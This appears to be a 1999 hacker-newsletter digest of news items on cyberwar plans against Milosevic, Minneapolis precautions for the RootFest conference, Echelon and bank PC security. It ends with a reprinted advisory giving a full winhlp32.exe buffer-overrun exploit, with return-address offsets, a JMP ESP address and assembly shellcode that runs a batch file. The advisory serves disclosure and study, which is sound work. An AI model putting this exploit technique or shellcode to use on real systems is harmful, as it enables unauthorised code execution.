Reuters and Wired Online articles are referencing a print story in Newsweek that claims that President Clinton has authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Reuters also claimed that Newsweek said that the report instructed the CIA to wage "cyberwar" against Milosevic. Now there are still a few questions that are not answered in this news article. If the report was so top-secret how did Newsweek learn of it? Won't other countries be rather upset when we "hack" into their banks? And aren't his bank accounts frozen anyway, so what is the point of breaking in? Newsweek even admits that it does not have access to the original report. Once again until we see confirmation HNN will treat this story as extremely suspect.

Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
Reuters - Via Yahoo
http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html
Wired
http://www.wired.com/news/news/politics/story/19836.html

Newsweek EXCLUSIVE
Cyberwar and Sabotage
President Clinton has OK'd a top-secret plan to destabilize Milosevic—and go after his money
By Gregory L. Vistica

Covert action is seductive to policymakers in a bind.
When diplomacy fails and force falls short, presidents often turn to the CIA for secret solutions to vexing problems. Unable to make the air war against Serbian leader Slobodan Milosevic effective, and unwilling to invade with ground troops, President Clinton has decided to try a clandestine third way. Earlier this month national-security adviser Sandy Berger presented Clinton with a covert plan to squeeze Milosevic. The president liked the idea. Senior intelligence officials tell NEWSWEEK that last week Clinton issued a "finding," a highly classified document authorizing the spy agency to begin secret efforts "to find other ways to get at Milosevic," in the words of one official. Two weeks ago Berger secretly briefed members of the House and Senate Intelligence committees about the details of the two-part plan.

According to sources who have read the finding, the CIA will train Kosovar rebels in sabotage—age-old tricks like cutting telephone lines, blowing up buildings, fouling gasoline reserves and pilfering food supplies—in an effort to undermine public support for the Serbian leader and damage Yugoslav targets that can't be reached from the air. That much is unsurprising. But the CIA has also been instructed to conduct a cyberwar against Milosevic, using government hackers to tap into foreign banks and, in the words of one U.S. official, "diddle with Milosevic's bank accounts."

The finding was immediately criticized by some lawmakers who questioned the wisdom—and legality—of launching a risky covert action that, if discovered, could prolong the war, alienate other NATO countries—and possibly blow back on the United States. Under the finding, the allies were to be kept in the dark about the plan. Other members of Congress privy to the finding wondered about its timing. Why did Clinton authorize the operation just as diplomats had begun making progress on a peace agreement?
The White House declined to comment on the finding, and NEWSWEEK does not have access to the entire document. But some intelligence officials with knowledge of its contents worry that the finding was put together too hastily, and that the potential consequences haven't been fully thought out. "If they pull it off, it will be great," says one government cyberwar expert. "If they screw it up, they are going to be in a world of trouble."

By far the most controversial—and probably most difficult—part of the operation would be the effort to hack into Milosevic's foreign bank accounts. Intelligence sources believe they have identified banks in several countries, including Russia, Greece and Cyprus, where the Serb leader has hidden millions of dollars. But the Hollywood vision of a brainy nerd draining bank accounts from his computer at CIA headquarters is a fantasy. According to government intelligence experts, agents would have to visit each of the banks, set up new accounts, then carefully watch how the institution operates and look for weak links in its security. The National Security Agency's hackers would use that information to try to overcome today's sophisticated encryption software and fire walls. If they gained access, the hackers could do almost anything they liked with Milosevic's cash—steal it, move it to a dummy account or slowly drain it away a few thousand dollars at a time.

But should they? The idea of a U.S.-sponsored plan to break into foreign banks unnerves some intelligence officials, who point out that the operation would be a breach of national sovereignty in friendly countries and open the door to computer attacks on U.S. banks. What's more, the United States would be the main loser if confidence in the world banking system were undermined.

The sabotage plan also entails some serious problems.
The CIA would somehow have to find and train guerrillas without helping the Kosovo Liberation Army, which the administration itself labeled a terrorist organization just a year ago and which is believed to fund its operations with profits from international drug smuggling. In the chaos now prevailing in Kosovar refugee camps it will not be easy for the CIA to make sure the anti-Milosevic rebels it signs up have no KLA ties. Intelligence officials also worry it would be difficult to control the U.S.-trained rebels once boot camp is over and they are set loose on Milosevic. "I'm afraid they could use their training to carry out atrocities," says John Rothrock, the Air Force's former chief of intelligence planning. "If they think they can rein them in, it's tremendous naiveté."

Congress can complain all it likes, but it has no legal authority to stop the finding. Lawmakers can try to block the plan by refusing to provide money for the covert action, but the president can tap into his emergency funds to finance it. At this point, it is not at all certain that the finding will ultimately be carried out. If the grumblings from the Hill and the intelligence community grow too loud, or if the risk-averse CIA chooses to drag its feet, the president may opt to quietly kill the finding—and pretend it never existed.

Newsweek, May 31, 1999

@HWA

03.1 More on the Cyberwar
~~~~~~~~~~~~~~~~~~~~

Contributed by Twstdpair (Source: MSNBC)

Cyberwar? The U.S. stands to lose
Experts argue plan to raid Milosevic's bank accounts would do more harm than good

May 28 - It sounded like a Tom Clancy spy novel. Newsweek reported last week that the CIA was planning to tinker with international bank accounts full of Slobodan Milosevic's money - just another way of getting under the Yugoslav president's skin. Information warfare experts disagree about the feasibility of such a cyberattack. But there's little disagreement the U.S.
stands to lose much more than it might gain from firing the first volley in such an information war. In fact, some believe damage has already been done.

THE NEWSWEEK STORY RAISED several issues: What international laws would govern a U.S.-backed attack on a bank in a third-party nation? Is such an attack feasible in the first place? What kind of retaliation might U.S. citizens, and their bank accounts, face? But most important, what does even the possibility of such an attack do to the integrity of international banking systems?

The story on the cyberattack - fact, fiction or somewhere in between - could already have put the U.S. at risk, said Kawika M. Dajuio, executive vice president of the Financial Information Protection Association. Banking systems hinge on public confidence. You put the money in; you're confident you'll be able to take the money out. If there's any hint you might not be able to get at your money, you'd withdraw it. Any attack on the integrity of a banking system anywhere - particularly when retaliation seems like such an obvious possibility - chips away at public confidence.

"It bothers me because we have had conversations with the defense and intelligence community. We thought this was off the table," Dajuio said. "We've had discussions with rather senior policy-makers. We thought they understood the importance of protecting public confidence in the payment system."

But retaliation by foreign agents might be just one source of insecurity for U.S. account holders. There's another: If the government can and is willing to tinker with foreign accounts, what will stop it from tinkering with mine?

COULD IT BE DONE?
Could U.S. agents hijack Milosevic's money, allegedly stashed away in foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control bank accounts for years, through old-fashioned non-cyber methods, such as coercing bank authorities, or even through legal methods such as freezing accounts.
On the other hand, it's not easy when the target knows what's coming. According to MSNBC analyst Bill Arkin, the international community, including UNSCOM, is still trying to get its hands on Saddam Hussein's assets. And such real-world tactics are a far cry from the cyberwar image of a few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection and some wits. There's disagreement about how possible that might be.

"The audits we have performed tell us [banks] are not invulnerable," says a security expert identifying himself as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate computer systems to test their vulnerability. "Banks have a little more security in place, but that security is still not at a level where it's unbreakable." While money systems aren't connected to the public Internet, "sometimes they have a modem dangling off for remote access, or they use cryptography, but not correctly," he said.

Others suggest cracking a bank that holds Milosevic money - outside the more traditional methods - is nearly impossible. "I deal in probabilities, and I've never seen it," said a man identifying himself as Louis Cipher, a principal investor in Infowar.com. Cipher is also in charge of security at what he says is the "sixth-largest brokerage in America." He suggested very few individuals have the skills necessary to "tunnel" from an Internet connection through mainframe systems in banks - in fact, a team of specialists and inside information would be required. "You'd have to be an applications specialist to even navigate to a screen," he said. "You're talking well beyond the skills of hackers. It would have to be an insider working with Job Control Language sitting on the mainframe. The only one who would have that ability other than the U.S. government would be organized crime." And Cipher is skeptical about the U.S.
government's ability to hire and hold the brightest minds in the security industry - since no government agency can match the lure of stock options offered by a high-tech firm.

Still, even the possibility of the U.S. using a wired computer to move Milosevic's money drew swift reaction from information warfare observers. Even hacker groups protested the notion, with a hacker calling himself "sixtoed" setting up a Web page in protest. The reason: Since the U.S. relies more on technology and information than any other nation, it stands to lose the most from such a cyberwar.

"I am not one for an information arms race," said Frank Cilluffo, senior analyst at the Center for Strategic and International Studies in Washington. "We will lose that race.... We're a hell of a lot more susceptible to retaliation. The defensive implications outweigh the offensive implications."

Anyone can build up an information warfare capability, Cilluffo said. And it's much more like guerrilla war than nuclear war - it's easy for the enemy to hide, and there's no real deterrent. Therefore, retaliation could be swift and indiscriminate. In addition, there is a general principle among security experts suggesting once a system's security is compromised, it's much easier to compromise a second time. So the U.S. could very well be paving the way for retribution.

WHY NO DENIALS?
Fear of such retaliation attempts, or even the perception of such retaliation attempts, drove Dajuio to start calling his friends in the intelligence community to complain as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for. "If it's true or it's just leaks, it's bad to have the story out there," Dajuio said. "I have yet to have anyone tell me 'Don't worry, everything's OK.' ... If they haven't done anything, the most appropriate thing to do is to come out and say they're not doing it."
The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't comment on its activities, but one source familiar with U.S. intelligence capabilities tells MSNBC to be "very skeptical" of the Newsweek story.

Meanwhile, opening the Pandora's box of cyberwar would lead to a series of yet-to-be answered questions. International law isn't ready to handle such conflicts, says Cilluffo - so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the compromised bank sue the U.S. government? "What are the rules of engagement here?" Cilluffo asked. "What is game, what is not game? This may be a harbinger of how we prosecute and wage war in the future."

@HWA

04.0 RootFest Scares Officials In Minneapolis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by erewhon
The hacker convention RootFest was held in Minneapolis over the weekend. Evidently this scared the local authorities enough to shut down several vulnerable points in the city's computer network. The city responded to the three day hacker convention by shutting down some older dial-up modem lines. (Wonder if they will come back online afterwards?) Other reports also indicate that the Minneapolis City Police also shut down its computer network over the weekend.

APB Online
http://www.apbonline.com/911/1999/05/21/hackers0521_01.html
WCCO Channel 4
http://www.wcco.com/news/stories/news-990521-184737.html
RootFest
http://www.rootfest.org
City of Minneapolis Action Plan
http://www.rootfest.org/Press/park.txt

APB Online:

HACKERS WORRY MINNEAPOLIS OFFICIALS
City Secures Its Computers as Conference Comes to Town
May 21, 1999
By Hans H. Chen

MINNEAPOLIS (APBNews.com) -- The arrival of several hundred computer hackers this weekend has prompted the city to shut down several vulnerable points in its computer network.
While the city's computer guru called the weekend shutdown "an opportunity to remind ourselves of network-based security," the conference organizer called the measures "an overly paranoid precaution."

The hackers descended today on the Minneapolis Convention Center for RootFest 99, a three-day discussion of computer security open to "the computer underground, hackers, IT professionals, government agents, feds," according to the conference's Web site. The conference features sessions entitled "Circumventing Internet Censorship," and "Internet Security in Europe: State of Affairs." Speakers include both hackers and computer security consultants.

City downplays concerns

But the city responded to the event by closing off some older dial-up modem lines that a few telecommuting employees and remote city agencies still use to connect into the city's network. Don Saelens, the city's information technology manager, downplayed concerns about possible hacking attempts. The conference, Saelens said, presented "an opportunity to remind ourselves of network-based security." But Saelens did admit that the timing of the system shutdown was not wholly coincidental. "We've been doing a number of upgrades on our own networks, and these were all slated to go out anyway this year," Saelens said. "I have to admit, [this conference] was a reminder of network security that heightened the awareness."

Police reportedly shut down

In addition, the Minneapolis Star Tribune reported that the city Police Department shut down its computer network over the weekend. Saelens and a police official refused to confirm the report, citing safety concerns. "The only thing the police is saying is we are not releasing anything we are doing for security reasons," said Penny Parrish, a police department spokeswoman.

'Hacker threat'?

Chris Lothos, an organizer of RootFest, attacked the city's measures in a dispatch on the RootFest Web site. "It's an overly paranoid precaution taken for the 'hacker threat' that RootFest supposedly poses to the world at large," Lothos wrote. The conference also printed on its Web site a copy of the e-mail memo Saelens sent to city employees alerting them to the security measures. Saelens said he's not sure how the group got a copy of his e-mail.

>Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker Conference this weekend
>Importance: High
>
>Minneapolis Park and Recreation ITS Hacker conference action plan:
>
>In response to the City's action plan noted below, Park Board ITS will be disabling the Park Board's Email services Friday evening, May 21st through Monday morning, May 24th. Park Board users will not have access at all to their Park Board Email accounts during this time.
>
>In addition - Dial-In (Reachout) services will be disabled Thursday evening, May 20th beginning at 8:00pm through Monday morning, May 24th. The Minneapolis rec centers and other remote users will not be able to access their Reachout accounts during this time. Remote PEIRS users entering time are advised to do so by Thursday evening, May 20th by 8:00pm. PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will be able to enter in time as usual.
>
>If you have questions, please contact the Park Board Help Desk at 661-XXXX. Thank you for your cooperation.
>
>Larry Brandts
>Park Board ITS Manager
>
>
>-----Original Message-----
>From: XXXXXXXXXXX
>Sent: Wednesday, May 19, 1999 10:35 AM
>To: All Exchange Users
>Subject: NOTICE TO ALL CITY COMPUTER USERS
>
>To all City Staff,
>RootFest '99, a convention of so-called computer "hackers" will be meeting in Minneapolis this weekend, May 21-23. You may have read news stories about individuals (hackers) who have used their computer programming skills to gain unauthorized access (hack) into computer networks of government agencies, businesses, banks, or other high-profile organizations. Sometimes, these individuals hack into computers to perform fairly harmless computer pranks. However, that is not always the case. Hackers can also infect entire computer networks with disabling viruses.
>
>As a precautionary measure, we are reminding you of safe computing practices that should already be followed, as well as some additional steps we will be taking to protect the City from any unauthorized access to our network. To be successful, we will need the active participation of all City staff.
>
>1. Employees must turn off their computer terminals at the close of business each night.
>
>2. Those who have an individual analog phone line and modem should be turning off the modem every night. There are very few of these individual analog lines and modems left in the City, and they are being phased out because of their risk to network security. Anyone who has one of the new City image pc's does not have to worry about this issue, as they are using the new City standard for remote access. If you have not had a line/modem installed, you do not need to do anything except turn off your pc.
>
>3. Employees will not have access to their City email accounts at all beginning Friday evening through Monday morning. There will not be access to email outside of the City from Thursday evening through Monday morning.
>
>4. Access to the City's network from outside locations will be temporarily cancelled Thursday evening through Monday morning. This will not impact the majority of staff members, but as an example, if you can currently check your City email account from home, you will not be able to do so during that timeframe.
>
>Employees who will be at work over the weekend will have access to Insite, the City's intranet, as well as the Internet.
>
>While I do not believe the City will be a target for these individuals, it is a prudent business decision to follow these simple safety precautions.
>If you have questions regarding any of these steps, please contact Wanda Forsythe, in ITS Security. Her number is 673-XXXX.
>
>Thank you for your attention to this matter.
>
>- Don Saelens
>* * * * * * * Sara Dietrich, Communications Department
>673-XXX; 673-XXXX (fax)

@HWA

05.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~

from HNN http://www.hackernews.com/
contributed by erewhon
Martin Brady, director of the Defense Signals Directorate in Canberra Australia has admitted that his country does participate in a secret spy organization known as UKUSA. This organization works with the intelligence agencies of Australia, Canada, New Zealand, the UK and the USA to intercept every fax, telex, e-mail, phone call, or computer data that is carried via commercial satellite communications. This global eavesdropping is known as Echelon.

The Age
http://www.theage.com.au/daily/990523/news/news3.html

The Age; Careful, they might hear you
By DUNCAN CAMPBELL

Australia has become the first country openly to admit that it takes part in a global electronic surveillance system that intercepts the private and commercial international communications of citizens and companies from its own and other countries.

The disclosure is made today in Channel 9's Sunday program by Martin Brady, director of the Defence Signals Directorate in Canberra.

Mr Brady's decision to break ranks and officially admit the existence of a hitherto unacknowledged spying organisation called UKUSA is likely to irritate his British and American counterparts, who have spent the past 50 years trying to prevent their own citizens from learning anything about them or their business of ``signals intelligence'' - ``sigint'' for short.

In his letter to Channel 9 published today, Mr Brady states that the Defence Signals Directorate (DSD) ``does cooperate with counterpart signals intelligence organisations overseas under the UKUSA relationship".
In other statements which have now been made publicly available on the Internet (www.dsd.gov.au), he also says that DSD's purpose ``is to support Australian Government decision-makers and the Australian Defence Force with high-quality foreign signals intelligence products and services. DSD (provides) important information that is not available from open sources".

Together with the giant American National Security Agency (NSA) and its Canadian, British, and New Zealand counterparts, DSD operates a network of giant, highly automated tracking stations that illicitly pick up commercial satellite communications and examine every fax, telex, e-mail, phone call, or computer data message that the satellites carry.

The five signals intelligence agencies form the UKUSA pact. They are bound together by a secret agreement signed in 1947 or 1948. Although its precise terms have never been revealed, the UKUSA agreement provides for sharing facilities, staff, methods, tasks and product between the participating governments.

Now, due to a fast-growing UKUSA system called Echelon, millions of messages are automatically intercepted every hour, and checked according to criteria supplied by intelligence agencies and governments in all five UKUSA countries. The intercepted signals are passed through a computer system called the Dictionary, which checks each new message or call against thousands of ``collection'' requirements. The Dictionaries then send the messages into the spy agencies' equivalent of the Internet, making them accessible all over the world.

Australia's main contribution to this system is an ultra-modern intelligence base at Kojarena, near Geraldton in Western Australia. The station was built in the early 1990s. At Kojarena, four satellite tracking dishes intercept Indian and Pacific Ocean communications satellites. The exact target of each dish is concealed by placing them inside golfball-like ``radomes''.
About 80 per cent of the messages intercepted at Kojarena are sent automatically from its Dictionary computer to the CIA or the NSA, without ever being seen or read in Australia. Although it is under Australian command, the station - like its controversial counterpart at Pine Gap - employs American and British staff in key posts.

Among the ``collection requirements" that the Kojarena Dictionary is told to look for are North Korean economic, diplomatic and military messages and data, Japanese trade ministry plans, and Pakistani developments in nuclear weapons technology and testing. In return, Australia can ask for information collected at other Echelon stations to be sent to Canberra.

A second and larger, although not so technologically sophisticated, DSD satellite station has been built at Shoal Bay, Northern Territory. At Shoal Bay, nine satellite tracking dishes are locked into regional communications satellites, including systems covering Indonesia and south-west Asia.

International and governmental concern about the UKUSA Echelon system has grown dramatically since 1996, when New Zealand writer Nicky Hager revealed intimate details of how it operated. New Zealand runs an Echelon satellite interception site at Waihopai, near Blenheim, South Island. Codenamed ``Flintlock", the Waihopai station is half the size of Kojarena and its sister NSA base at Yakima, Washington, which also covers Pacific rim states. Waihopai's task is to monitor two Pacific communications satellites, and intercept all communications from and between the South Pacific islands.

Like other Echelon stations, the Waihopai installation is protected by electrified fences, intruder detectors and infra-red cameras. A year after publishing his book, Hager and New Zealand TV reporter John Campbell mounted a daring raid on Waihopai, carrying a TV camera and a stepladder. From open, high windows, they then filmed into and inside its operations centre.
They were astonished to see that it operated completely automatically.

Although Australia's DSD does not use the term ``Echelon'', Government sources have confirmed to Channel 9 that Hager's description of the system is correct, and that Australia's Dictionary computer at Kojarena works in the same way as the one in New Zealand.

Until this year, the US Government has tried to ignore the row over Echelon by refusing to admit its existence. The Australian disclosures today make this position untenable. US intelligence writer Dr Jeff Richelson has also obtained documents under the US Freedom of Information Act, showing that a US Navy-run satellite receiving station at Sugar Grove, West Virginia, is an Echelon site, and that it collects intelligence from civilian satellites. The station, south-west of Washington, lies in a remote area of the Shenandoah Mountains. According to the released US documents, the station's job is ``to maintain and operate an Echelon site''.

Other Echelon stations are at Sabana Seca, Puerto Rico, Leitrim, Canada and at Morwenstow and London in Britain. Information is also fed into the Echelon system from taps on the Internet, and by means of monitoring pods which are placed on undersea cables. Since 1971, the US has used specially converted nuclear submarines to attach tapping pods to deep underwater cables around the world.

The Australian Government's decision to be open about the UKUSA pact and the Echelon spy system has been motivated partly by the need to respond to the growing international concern about economic intelligence gathering, and partly by DSD's desire to reassure Australians that its domestic spying activity is strictly limited and tightly supervised. According to DSD director Martin Brady, ``to ensure that (our) activities do not impinge on the privacy of Australians, DSD operates under a detailed classified directive approved by Cabinet and known as the Rules on Sigint and Australian Persons".
Compliance with this Cabinet directive is monitored by the inspector-general of security and intelligence, Mr Bill Blick. He says that ``Australian citizens can complain to my office about the actions of DSD. And if they do so then I have the right to conduct an inquiry."

But the Cabinet has ruled that Australians' international calls, faxes or e-mails can be monitored by NSA or DSD in specified circumstances. These include ``the commission of a serious criminal offence; a threat to the life or safety of an Australian; or where an Australian is acting as the agent of a foreign power". Mr Brady says that he must be given specific approval in every case. But deliberate interception of domestic calls in Australia should be left to the police or ASIO.

Mr Brady claims that other UKUSA nations have to follow Australia's lead, and not record their communications unless Australia has decided that this is required. ``Both DSD and its counterparts operate internal procedures to satisfy themselves that their national interests and policies are respected by the others," he says. So if NSA happens to intercept a message from an Australian citizen or company whom DSD has decided to leave alone, they are supposed to strike out the name and insert ``Australian national'' or ``Australian corporation'' instead. Or they must destroy the intercept.

That's the theory, but specialists differ. According to Mr Hager, junior members of UKUSA just can't say ``no''. ``... When you're a junior ally like Australia or New Zealand, you never refuse what they ask for.''

There are also worries about what allies might get up to with information that Australia gives them. When Britain was trying to see through its highly controversial deal to sell Hawk fighters and other arms to Indonesia, staff at the Office of National Assessments feared that the British would pass DSD intelligence on East Timor to President Soeharto in order to win the lucrative contract.
The Australian Government does not deny that DSD and its UKUSA partners are told to collect economic and commercial intelligence. Australia, like the US, thinks this is especially justified if other countries or their exporters are perceived to be behaving unfairly. Britain recognises no restraint on economic intelligence gathering. Neither does France.

According to the former Canadian agent Mike Frost, it would be "naive" for Australians to think that the Americans were not exploiting stations like Kojarena for economic intelligence purposes. "They have been doing it for years," he says. "Now that the Cold War is over, the focus is towards economic intelligence. Never ever over-exaggerate the power that these organisations have to abuse a system such as Echelon. Don't think it can't happen in Australia. It does."

@HWA

06.0 Banks to Test Home User PC Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

from HNN http://www.hackernews.com/
contributed by Weld Pond

Worried that consumers' PCs may be vulnerable to attack, a consortium of the 15 largest US banks plans to open a lab to test PC hardware and software. The Banking Industry Technology Secretariat plans to open the lab this summer.

(It's about time they started looking into this. Applications like Back Orifice have been around for what? over a year now? Sounds like someone is just covering their ass.)

C|Net http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh

Big banks move on Net security
By Tim Clark
Staff Writer, CNET News.com
May 21, 1999, 1:00 p.m. PT

Worried that problems on home computers may make Internet banking insecure, a group of major U.S. banks is expected to unveil a plan this summer to open a lab to test the security of Web browsers and PC hardware and software.
"The banks feel that firewalls and what they have internally is in great shape, but the link is to the consumer and PC environments [where they find security more suspect]," said Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division of Bankers Roundtable. BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America. Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that focuses on technology issues affecting the U.S. banking system. The BITS Security/Technology Lab, to be run by a new banking-oriented division of government contractor SAIC, is due to be announced in late June or early July, with vice president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is planned in the San Francisco area to explain the program to hardware and software vendors. Security experts from major banks are currently drafting the testing criteria. In addition, the lab oversight group is working with the President's Commission on Critical Infrastructure Protection on ways to protect the nation's financial infrastructure from attacks by terrorist or organized criminal groups. President Clinton formed that group a year ago after a report on threats from cyber-terrorists. The effort also will involve information sharing among banks to ward off organized attacks, including use of neural networking and other technologies to detect and predict patterns of attacks. "If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen said. "They won't hit just one bank but many." Security planners worry that assaults could be mounted near the end of this year, when attackers hope banks might be distracted by the Y2K turnover. 
The testing of consumer devices and software will be coupled with educational campaigns urging users to utilize antivirus software and take other precautions to avoid security problems. Systems that pass the tests can use a special logo in their marketing to signify the products have been deemed safe by BITS. Also to be tested are systems to conduct financial transactions, including personal financial software, online billing and bill-paying packages, and smart cards.

"Vendors want this as much as we do," Allen contended, saying that today vendors may get multiple requests from different banks to make specific changes for that bank's use. Funneling through the BITS lab would simplify that process.

The effort comes as financial institutions are beginning to use the Internet for online banking, stock trading, and other transactions. In the past, online consumer transactions have been routed over private networks that banks regard as more secure. But the explosion of the Internet, which is not such a controlled or secure environment, has bankers looking for safety.

Another reflection of that concern has been the efforts by Visa and MasterCard, on the behalf of their bank-owners, to push the Secure Electronic Transactions (SET) protocol for Internet credit card purchases. Although SET has not been widely adopted in the U.S., the prolonged push to implement it mirrors bankers' worries about their reputation as trusted institutions.

But there's a financial implication too. Banks are heavily regulated, and they are required to reimburse their customers for any losses suffered because of security breaches in online financial transactions. As online banking grows, that could become a big liability.

@HWA

07.0 EMPEROR VIRUS
     ~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Tuesday 25th May 1999 on 4.46 pm CET

AVP announced a new clone of the Chernobyl virus named Emperor.
The Emperor virus has additional technology to infect more systems by copying itself to more areas of the computer and has the possibility to travel further. It infects DOS (16-bit) COM and EXE programs and overwrites the Master Boot Record of the hard drive and boot sector on floppy diskettes.

08.0 WINHLP32.EXE BUFFER OVERRUN
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Tuesday 25th May 1999 on 1.01 am CET

David Litchfield aka Mnemonix wrote an advisory on the winhlp32.exe buffer overrun. "The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry." Read the advisory below.

Analysis of the winhlp32.exe buffer overrun.

The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry. The return address is overwritten with bytes 357, 358, 359 and 360. Everything before these bytes is lost giving us bytes 361 to 507 to play with - a total of 147 bytes for our exploit code. On playing around with the overrun we find we lose about another 20 of these bytes giving us only 127 bytes to play with - not a lot really.

On overrunning the buffer and analysing the contents of memory and the CPU's registers with a debugger we find that byte 361 is found at 0x0012F0E4. This is the address we need to get the processor to go to to get its next instruction - but this address has a NULL in it which totally messes things up. However, looking at the registers we can see that the ESP, the Stack Pointer, holds this address so if we can find somewhere in memory that does a JMP ESP, and set the return address to this then we should be able to get back to the address where we'll place our exploit code.
Looking at the DLLs that winhlp32.exe uses we find that kernel32.dll has the JMP ESP instruction at 0x77F327E5 (Service Pack 4's version of kernel32.lib - I think it's at 0x77F327D5 on Service Pack 3's kernel32.dll). So we put 0x77F327E5 into bytes 357 to 360 but we have to load it in backwards so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3 and byte 360 to 0x77.

Now we've jumped back to our exploit code we have to decide what we want to put in it. Because we only have 127 bytes to do anything meaningful we need to start another program - the best thing is to get it to run a batch file. This means calling the system ( ) function which is exported by msvcrt.dll which isn't loaded into the address space of winhlp32.exe - so we'll have to load it. How do we do this? We have to call LoadLibrary ( ) which is exported by kernel32.dll which is in the address space. LoadLibraryA ( ) is exported at address 0x77F1381A so all we need to do is have the string "msvcrt.dll" in memory somewhere and call 0x77F1381A with a reference to the pointer to the null terminated "msvcrt.dll" string. Because it has to be null terminated we'll get our code to write it into memory. Once this is done we'll place the address of LoadLibraryA ( ) onto the stack then place the address of the pointer to "msvcrt.dll" and finally call LoadLibraryA ( ) using an offset from the EBP.
The following is the Assembly Code needed to do this:

    /* First the procedure prologue */
    push ebp
    mov ebp,esp
    /* Now we need some zeroes */
    xor eax,eax
    /* and then push them onto the stack */
    push eax
    push eax
    push eax
    /* Now we write MSVCRT.DLL into the stack */
    mov byte ptr[ebp-0Ch],4Dh
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    /* move the address of LoadLibraryA ( ) into the edx register */
    mov edx,0x77F1381A
    /* and then push it onto the stack */
    push edx
    /* Then we load the address where the msvcrt.dll string can be found */
    lea eax,[ebp-0Ch]
    /* and push it onto the stack */
    push eax
    /* Finally we call LoadLibraryA( ) */
    call dword ptr[ebp-10h]

All things going well we should have now loaded msvcrt.dll into the address space of winhlp32.exe. With this in place we now need to call system() and provide the name of a batch file to it as an argument. We don't have enough bytes to play with to call GetProcAddress ( ) and do the rest of the things we have to do like clean up so we check what version of msvcrt.dll we have before writing the code and see where system ( ) is exported at. On a standard install of Windows NT this will normally be version 4.20.6201 with system () exported at 0x7801E1E1. We'll call the batch file ADD.bat but to save room we won't give it an extension. The system ( ) function will try the default executable extensions like .exe, .com and .bat and find it for us then run it. Once it has run it the cmd.exe process system( ) has launched will exit. So we need to have the null terminated string "ADD" in memory and the address of system ( ).
Below is the code that will write "ADD" onto the stack and then call system( )

    /* First the procedure prologue */
    push ebp
    mov ebp,esp
    /* We need some NULLs and then push them onto the stack */
    xor edi,edi
    push edi
    /* Now we write ADD onto the stack */
    mov byte ptr [ebp-04h],41h
    mov byte ptr [ebp-03h],44h
    mov byte ptr [ebp-02h],44h
    /* Place address of system ( ) into eax and push it onto the stack */
    mov eax, 0x7801E1E1
    push eax
    /* Now load eax with address of ADD and push this too */
    lea eax,[ebp-04h]
    push eax
    /* Then we call system ( ) */
    call dword ptr [ebp-08h]

Once the batch file has been run the Command Interpreter will exit and if we don't clean up after ourselves winhlp32.exe will access violate so we need to call exit (0) to keep it quiet. exit ( ) is also exported by msvcrt.dll at address 0x78005BBA - which has a null in it. It's not a major problem - we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The following code calls exit (0)

    /* Procedure prologue */
    push ebp
    mov ebp,esp
    /* Round about way of getting address of exit () into edx:
       0xFFFFFFFF - 0x87FFA445 = 0x78005BBA */
    mov edx,0xFFFFFFFF
    sub edx,0x87FFA445
    /* Push this address onto the stack */
    push edx
    /* Get some nulls - this is our exit code - and push them too */
    xor eax,eax
    push eax
    /* then call exit()! */
    call dword ptr[ebp-04h]

Altogether our code looks like this:

    push ebp
    mov ebp,esp
    xor eax,eax
    push eax
    push eax
    push eax
    mov byte ptr[ebp-0Ch],4Dh
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    mov edx,0x77F1381A
    push edx
    lea eax,[ebp-0Ch]
    push eax
    call dword ptr[ebp-10h]
    push ebp
    mov ebp,esp
    xor edi,edi
    push edi
    mov byte ptr [ebp-04h],41h    /* 'A' */
    mov byte ptr [ebp-03h],44h    /* 'D' */
    mov byte ptr [ebp-02h],44h    /* 'D' */
    mov eax, 0x7801E1E1
    push eax
    lea eax,[ebp-04h]
    push eax
    call dword ptr [ebp-08h]
    push ebp
    mov ebp,esp
    mov edx,0xFFFFFFFF
    sub edx,0x87FFA445
    push edx
    xor eax,eax
    push eax
    call dword ptr[ebp-04h]

